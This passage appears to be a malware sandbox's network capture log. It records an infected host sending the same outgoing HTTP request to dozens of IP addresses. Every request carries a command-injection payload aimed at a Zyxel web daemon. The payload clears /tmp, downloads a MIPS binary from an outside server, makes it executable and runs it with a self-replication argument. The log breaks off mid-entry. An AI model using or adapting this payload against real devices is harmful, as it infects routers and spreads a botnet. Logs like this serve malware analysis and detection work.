                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726159096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9138192.168.2.2343640147.111.98.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726195097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9139192.168.2.233535219.149.97.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726233006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9140192.168.2.235623269.251.55.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726294994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9141192.168.2.2358394184.185.41.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726340055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9142192.168.2.2357814177.176.5.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726372957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9143192.168.2.2343102142.62.18.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726397991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9144192.168.2.2357286156.43.28.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726440907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9145192.168.2.2345594163.92.184.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726499081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9146192.168.2.234626444.49.119.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726542950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9147192.168.2.235064067.31.63.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726558924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9148192.168.2.2354872124.19.193.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726588964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9149192.168.2.2356688103.203.205.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726618052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9150192.168.2.2348066213.173.209.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726667881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9151192.168.2.236071064.32.82.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726697922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9152192.168.2.2334810139.138.157.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726730108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9153192.168.2.2335240216.145.104.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726773024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9154192.168.2.2339240104.71.238.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726814032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9155192.168.2.234874079.84.180.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726871967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9156192.168.2.233724261.159.189.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726897001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9157192.168.2.234245039.228.17.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726938009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9158192.168.2.2347928144.113.174.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726959944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9159192.168.2.2337492198.151.130.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727011919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9160192.168.2.2352984169.239.132.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727073908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9161192.168.2.233332069.9.13.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727129936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9162192.168.2.2346660168.152.221.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727154016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9163192.168.2.2344618185.14.113.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727189064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9164192.168.2.233854497.62.128.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727215052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9165192.168.2.233929638.202.183.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727252007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9166192.168.2.235065275.212.138.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727318048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9167192.168.2.2336754163.64.240.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727369070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9168192.168.2.2348566158.230.179.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727392912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9169192.168.2.2357946100.158.189.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727443933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9170192.168.2.235806097.174.128.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727473974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9171192.168.2.235949234.88.239.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727526903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9172192.168.2.2337808121.70.183.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727571011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9173192.168.2.235881663.159.104.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727601051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9174192.168.2.2343562112.108.231.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727652073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9175192.168.2.233291841.82.86.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727682114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9176192.168.2.2334744118.226.210.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727735043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9177192.168.2.2352632152.97.134.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727765083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9178192.168.2.2357802204.99.196.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727792978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9179192.168.2.2332994177.146.207.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727847099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9180192.168.2.2356364188.179.199.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727869987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9181192.168.2.2342190192.41.63.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727916956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9182192.168.2.2345132177.7.31.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727951050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9183192.168.2.236014612.10.132.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.727976084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9184192.168.2.2348526138.168.204.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728015900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9185192.168.2.2353608206.247.206.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728058100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9186192.168.2.2334546130.221.24.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728105068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9187192.168.2.2335908200.2.162.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728146076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9188192.168.2.234489823.238.252.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728194952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9189192.168.2.2333352154.27.123.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728241920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9190192.168.2.234923684.37.78.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728265047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9191192.168.2.2343608201.234.21.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728291035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192192.168.2.2340776159.48.199.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728323936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9193192.168.2.2354968209.176.188.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728382111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9194192.168.2.235318645.57.133.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728413105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9195192.168.2.235889431.54.211.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728440046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9196192.168.2.2348836179.67.98.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728485107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9197192.168.2.235376050.60.82.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728522062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9198192.168.2.2342338188.30.160.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728552103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9199192.168.2.2347708168.230.54.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728595018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9200192.168.2.2350174134.28.116.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.728627920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9201192.168.2.2347254203.155.96.108443
                                                TimestampBytes transferredDirectionData
